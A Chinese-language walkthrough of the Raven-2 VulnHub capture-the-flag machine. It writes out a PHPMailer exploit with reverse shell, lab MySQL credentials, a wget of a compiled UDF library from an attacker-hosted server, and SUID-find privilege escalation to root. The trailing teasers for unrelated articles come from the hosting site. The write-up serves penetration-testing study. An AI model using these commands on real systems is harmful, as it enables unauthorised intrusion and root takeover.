【OSCP-vulnhub】Raven-2

目錄

端口掃描

本地/etc/hosts文件解析

目錄掃描:

第一個flag

利用msf下載exp

flag2

flag3

Mysql登錄

查看mysql的運行權限

MySql提權:UDF

查看數據庫寫入條件

查看插件目錄

查看是否可以遠程登錄

gcc編譯.o文件

創建so文件

創建臨時監聽

執行sql語句

創建數據表feng

插入數據文件

導出數據

創建自定義函數do_system

查詢一下添加的函數

利用do_system給find命令賦予suid權限

find命令提權

The end(獲取flag)

flag4{df2bc5e951d91581467bb9a2a8ff4425}

端口掃描

nmap -sS -p- 192.168.56.105 -sV -A --version-all -sC

圖片

?

訪問網站發現沒什么可關注的點,點到blog的時候顯示不可訪問

圖片

?

這個時候就聯想到了

本地/etc/hosts文件解析

就能正常訪問了。。

圖片

?

目錄掃描:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.56.105

圖片

?

誒嘿,掃出了蠻多個目錄的

在/vendor/PATH發現

第一個flag

圖片

?

在readme發現很多關于PHPMailer的信息

圖片

?

以及http://192.168.56.105/vendor/VERSION在這里面提示版本為5.2.16

我們隨即便去查找一下相關的exp

利用msf下載exp

圖片

?

修改代碼

依次修改可以發送郵件的路徑,要定義的后門文件/shell.php,要回連的地址以及端口,還有網站的后門文件保存路徑

圖片

?

python 40974.py

接著訪問/contact.php觸發后門文件再訪問/shell.php就可以進行反彈shell。。。

圖片

?

建立交互式終端

python -c?'import pty;pty.spawn("/bin/bash")'

查找flag

find / -name flag*?

找到兩個有關flags的信息

  • ?/var/www/flag2.txt

  • ?/var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png

flag2

cat /var/www/flag2.txt

圖片

?

flag3

圖片

?

接著在wordpress目錄發現數據庫密碼

圖片

?

用戶名:root,密碼:R@v3nSecurity

Mysql登錄

mysql -uroot -pR@v3nSecurity
mysql> show databases;

+--------------------+ | Database ? ? ? ? ? | +--------------------+ | information_schema | | mysql ? ? ? ? ? ? ?| | performance_schema | | wordpress ? ? ? ? ?| +--------------------+

mysql> use wordpress
mysql> show tables;

+-----------------------+ | Tables_in_wordpress ? | +-----------------------+ | wp_commentmeta ? ? ? ?| | wp_comments ? ? ? ? ? | | wp_links ? ? ? ? ? ? ?| | wp_options ? ? ? ? ? ?| | wp_postmeta ? ? ? ? ? | | wp_posts ? ? ? ? ? ? ?| | wp_term_relationships | | wp_term_taxonomy ? ? ?| | wp_termmeta ? ? ? ? ? | | wp_terms ? ? ? ? ? ? ?| | wp_usermeta ? ? ? ? ? | | wp_users ? ? ? ? ? ? ?| +-----------------------+

select * from wp_users;

michael? ? |?BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0

steven? ? ?|?B6X3H3ykawf2oHuPsbjQiih5iJXqad.

查看mysql的運行權限

是root權限在運行

ps -aux | grep mysql

MySql提權:UDF

查看數據庫寫入條件
show global variables like 'secure%';

+------------------+-------+ | Variable_name ? ?| Value | +------------------+-------+ | secure_auth ? ? ?| OFF ? | | secure_file_priv | ? ? ? | +------------------+-------+

  • ?1)當 secure_file_priv 的值為?NULL?,表示限制 mysqld 不允許導入|導出,此時無法提權

  • ?2)當 secure_file_priv 的值為?/tmp/?,表示限制 mysqld 的導入|導出只能發生在 /tmp/目錄下,此時也無法提權

  • ?3)當 secure_file_priv 的值沒有具體值時,表示不對 mysqld 的導入|導出做限制,此時可提權! 如果是 MySQL >= 5.1 的版本,必須把 UDF 的動態鏈接庫文件放置于 MySQL 安裝目錄下的 lib\plugin 文件夾下文件夾下才能創建自定義函數。

查看插件目錄
show variables like '%plugin%';

+---------------+------------------------+ | Variable_name | Value ? ? ? ? ? ? ? ? ?| +---------------+------------------------+ | plugin_dir ? ?|?/usr/lib/mysql/plugin/?| +---------------+------------------------+

查看是否可以遠程登錄
use mysql
select user,host from user;

+------------------+-----------+ | user ? ? ? ? ? ? | host ? ? ?| +------------------+-----------+ | root ? ? ? ? ? ? | 127.0.0.1 | | root ? ? ? ? ? ? | ::1 ? ? ? | | debian-sys-maint | localhost | | root ? ? ? ? ? ? | localhost | | root ? ? ? ? ? ? | raven ? ? | +------------------+-----------+

發現root用戶不允許遠程登錄,所以不能使用MSF提權

searchsploit udf

圖片

?

gcc編譯.o文件

gcc -g -c?1518.c
創建so文件
gcc -g -shared -Wl,-soname,exp.so -o?exp.so?1518.o -lc
  • ?-g 生成調試信息

  • ?-c 編譯(二進制)

  • ?-shared:創建一個動態鏈接庫,輸入文件可以是源文件、匯編文件或者目標文件。

  • ?-Wl,-soname,exp.so

    • -Wl?表示將后續參數傳遞給鏈接器(ld)。

    • -soname,exp.so?設置動態庫的?內部名稱SONAME),影響動態鏈接時的庫查找行為。

  • ?-o:執行命令后的文件名

  • ?-lc:-l 庫 c庫名

創建臨時監聽
python -m http.server?8080
wget http://192.168.56.103:8080/1518.so -O test.so
執行sql語句
use mysql;
創建數據表feng
create table feng(line blob);
插入數據文件
insert into feng values(load_file('/tmp/test.so'));
導出數據
  • outfile 多行導出,dumpfile一行導出

    select * from feng into dumpfile '/usr/lib/mysql/plugin/test.so';
    
創建自定義函數do_system

(或者sys_exec)類型是integer,別名(soname)文件名字

create function do_system returns integer soname 'test.so';
查詢一下添加的函數
select * from mysql.func;
利用do_system給find命令賦予suid權限
select do_system('chmod u+s /usr/bin/find');
find命令提權

創建一個文件:touch feng

find / -name feng -exec "/bin/sh" \;

id uid=33(www-data) gid=33(www-data)?euid=0(root)?groups=33(www-data)

The end(獲取flag)

cd?/rootlscat flag4.txt ?

flag4{df2bc5e951d91581467bb9a2a8ff4425}


好啦,本文的內容就到這了,希望對你有所幫助。。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/diannao/80208.shtml
繁體地址,請注明出處:http://hk.pswp.cn/diannao/80208.shtml
英文地址,請注明出處:http://en.pswp.cn/diannao/80208.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Podman Desktop:現代輕量容器管理利器(Podman與Docker)

前言 什么是 Podman Desktop? Podman Desktop 是基于 Podman CLI 的圖形化開源容器管理工具,運行在 Windows(或 macOS)上,默認集成 Fedora Linux(WSL 2 環境)。它提供與 Docker 類似的使用體驗…

極狐GitLab 權限和角色如何設置?

極狐GitLab 是 GitLab 在中國的發行版,關于中文參考文檔和資料有: 極狐GitLab 中文文檔極狐GitLab 中文論壇極狐GitLab 官網 權限和角色 (BASIC ALL) 將用戶添加到項目或群組時,您可以為他們分配角色。該角色決定他們在極狐GitLab 中可以執…

解鎖現代生活健康密碼,開啟養生新方式

在科技飛速發展的當下,我們享受著便捷生活,卻也面臨諸多健康隱患。想要維持良好狀態,不妨從這些細節入手,解鎖科學養生之道。? 腸道是人體重要的消化器官,也是最大的免疫器官,養護腸道至關重要。日常可多…

Kafka 主題設計與數據接入機制

一、前言:萬物皆流,Kafka 是入口 在構建實時數倉時,Kafka 既是 數據流動的起點,也是后續流處理系統(如 Flink)賴以為生的數據源。 但“消息進來了” ≠ “你就能處理好了”——不合理的 Topic 設計、接入方…

【繪制圖像輪廓|凸包特征檢測】圖像處理(OpenCV) -part7

15 繪制圖像輪廓 15.1 什么是輪廓 輪廓是一系列相連的點組成的曲線,代表了物體的基本外形。相對于邊緣,輪廓是連續的,邊緣不一定連續,如下圖所示。輪廓是一個閉合的、封閉的形狀。 輪廓的作用: 形狀分析 目標識別 …

uniapp中使用<cover-view>標簽

文章背景&#xff1a; uniapp中遇到了原生組件(canvas)優先級過高覆蓋vant組件 解決辦法&#xff1a; 使用<cover-view>標簽 踩坑&#xff1a; 我想實現的是一個vant組件庫中動作面板的效果&#xff0c;能夠從底部彈出框&#xff0c;讓用戶進行選擇&#xff0c;我直…

Kafka常見問題及解決方案

Kafka 是一個強大的分布式流處理平臺&#xff0c;廣泛用于高吞吐量的數據流處理&#xff0c;但在實際使用過程中&#xff0c;也會遇到一些常見問題。以下是一些常見的 Kafka 問題及其對應的解決辦法的詳細解答&#xff1a; 消息丟失 一、原因 1.生產端 網絡故障、生產者超時…

leetcode 二分查找應用

34. Find First and Last Position of Element in Sorted Array 代碼&#xff1a; class Solution { public:vector<int> searchRange(vector<int>& nums, int target) {int low lowwer_bound(nums,target);int high upper_bound(nums,target);if(low high…

【Docker】在容器中使用 NVIDIA GPU

解決容器 GPU 設備映射問題&#xff0c;實現 AI 應用加速 &#x1f517; 官方文檔&#xff1a;NVIDIA Container Toolkit GitHub 常見錯誤排查 若在運行測試容器時遇到以下錯誤&#xff1a; docker: Error response from daemon: could not select device driver ""…

通過Quartus II實現Nios II編程

目錄 一、認識Nios II二、使用Quartus II 18.0Lite搭建Nios II硬件部分三、軟件部分四、運行項目 一、認識Nios II Nios II軟核處理器簡介 Nios II是Altera公司推出的一款32位RISC嵌入式處理器&#xff0c;專門設計用于在FPGA上運行。作為軟核處理器&#xff0c;Nios II可以通…

JAVA設計模式——(三)橋接模式

JAVA設計模式——&#xff08;三&#xff09;橋接模式&#xff08;Bridge Pattern&#xff09; 介紹理解實現武器抽象類武器實現類涂裝顏色的行為接口具體顏色的行為實現讓行為影響武器修改武器抽象類修改實現類 測試 適用性 介紹 將抽象和實現解耦&#xff0c;使兩者可以獨立…

k8s 證書相關問題

1.重新生成新證書 kubeadm init phase certs apiserver-etcd-client --config ~/kubeadm.yaml這個命令表示生成 kube-apiserver 連接 etcd 使用的證書,生成后如下 -rw------- 1 root root 1.7K Apr 23 16:35 apiserver-etcd-client.key -rw-r--r-- 1 root root 1.2K Apr 23 …

比較:AWS VPC peering與 AWS Transit Gateway

簡述: VPC 對等連接和 Transit Gateway 用于連接多個 VPC。VPC 對等連接提供全網狀架構,而 Transit Gateway 提供中心輻射型架構。Transit Gateway 提供大規模 VPC 連接,并簡化了 VPC 間通信管理,相比 VPC 對等連接,支持大量 VPC 的 VPC 間通信管理。 VPC 對等連接 AWS V…

制造企業PLM深度應用:2025年基于PDCA循環的7項持續改進指標

制造企業的產品生命周期管理&#xff08;PLM&#xff09;在數字化轉型的浪潮中扮演著至關重要的角色。PLM深度應用不僅能夠提升產品研發效率、保證產品質量&#xff0c;還能增強企業在市場中的競爭力。隨著2025年智能制造目標的推進&#xff0c;基于PDCA循環的持續改進對于PLM的…

極狐GitLab 的壓縮和合并是什么?

極狐GitLab 是 GitLab 在中國的發行版&#xff0c;關于中文參考文檔和資料有&#xff1a; 極狐GitLab 中文文檔極狐GitLab 中文論壇極狐GitLab 官網 壓縮和合并 (BASIC ALL) 在你處理一個特性分支時&#xff0c;通常會創建一些小的、獨立的提交。這些小提交幫助描述構建特性…

解耦舊系統的利器:Java 中的適配器模式(Adapter Pattern)實戰解析

在現代軟件開發中&#xff0c;我們經常需要與舊系統、第三方庫或不一致接口打交道。這時候&#xff0c;如果能優雅地整合這些不兼容組件&#xff0c;又不破壞原有結構&#xff0c;就需要一位“翻譯官” —— 適配器模式。本文將通過 Java 實例&#xff0c;詳細講解適配器模式的…

03-谷粒商城筆記

一個插件的install和生命周期的報錯是不一樣的 Maven找不到ojdbc6和sqljdbc4依賴包 這時候我找到了jar包&#xff0c;然后我就先找到一個jar安裝到了本地倉庫。 在終端上進行命令了&#xff1a; mvn install:install-file -DfileD:\ojdbc6-11.2.0.4.jar -DgroupIdcom.oracle …

黑馬點評redis改 part 5

達人探店 發布探店筆記 那第一張表block表它里邊的結構呢是這個 首先呢第一個字段是i d&#xff0c;就是主鍵&#xff0c;第二個呢是shop id&#xff0c;就是商戶你發的這個比例啊&#xff0c;它是跟哪個商戶有關系的。第三個呢用戶id就是誰發的這篇筆記&#xff0c;第四個呢標…

【PCB工藝】運放電路中的負反饋機制

通過運算方法器電路設計詳細解釋負反饋機制&#xff08;Negative Feedback&#xff09; 負反饋 是控制系統、電子電路、神經系統等多個領域中非常核心的概念。特別在運算放大器&#xff08;Op-Amp&#xff09;電路中&#xff0c;負反饋是實現精確控制和高穩定性的關鍵機制。 …

聲紋振動傳感器在電力監測領域的應用

聲紋振動傳感器在電力監測領域有多種應用&#xff0c;主要包括以下幾個方面&#xff1a; 變壓器監測 故障診斷&#xff1a;變壓器在運行過程中會產生特定的聲紋和振動信號&#xff0c;當變壓器內部出現故障&#xff0c;如繞組短路、鐵芯松動、局部放電等&#xff0c;其聲紋和振…